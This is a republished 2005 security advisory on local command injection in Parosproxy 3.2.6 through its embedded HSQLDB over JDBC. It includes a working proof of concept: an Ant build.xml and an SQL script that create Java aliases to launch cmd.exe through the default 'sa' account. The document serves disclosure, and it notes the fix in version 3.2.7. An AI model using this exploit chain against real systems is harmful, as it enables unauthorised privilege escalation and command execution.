Local Exploitation, Command injection vulnerability

2005.11.05
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Hello, first word to say: Parosproxy is a great tool, it has helped me a lot during pentesting. Unfortunately the JDK until version 1.4.2_08 is vulnerable in a way that allows to use JDBC as an attack path. Parosproxy uses JDBC to persist some state data. Concerning the release 3.2.6 of Parosproxy [www.parosproxy.org], there is a minor problem when running it with JDK 1.4.2 until subrelease 08. It can be used to trigger command injection in the embedded HSQLDB via the JDBC (localhost on port 9001) by another (like unprivileged user with lesser rights than the paros process) user on the machine. This results in privilege escalation. Demonstration files (see below) have been provided to contact (at) parosproxy (dot) org. [email concealed] A similar problem with HSQLDB has occured a while ago when exploiting former version of JBoss [http://www.illegalaccess.org/java/jboss.php], you will find further details there. According to parosproxy.org this problem has been solved with Paros version 3.2.7. Please update your old 3.2.6 or older version, it's good and it's free ! Sincerely Marc Schnefeld =======build.xml========== <project name="sql" default="exec"> <target name="exec"> <sql driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:hsql://localhost:9001" userid="sa" password="" print="true"> <fileset dir="."> <include name="*.sql"/> </fileset> <classpath> <pathelement location="lib.jar"/> </classpath> </sql> </target> </project> =======build.xml========== =======exec.sql========== CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug" ; CALL COMPDEBUG(true); CREATE ALIAS SETPROP FOR "java.lang.System.setProperty"; CALL SETPROP ('org.apache.xml.utils.synthetic.javac','cmd.exe') ; CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile" ; CALL COMPILE('a','/c "cmd.exe /c notepad.exe c:windowssystem32driversetchosts >" ') ; CREATE ALIAS GETPROP FOR "java.lang.System.getProperty"; CALL GETPROP('org.apache.xml.utils.synthetic.javac') ; =======exec.sql==========


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top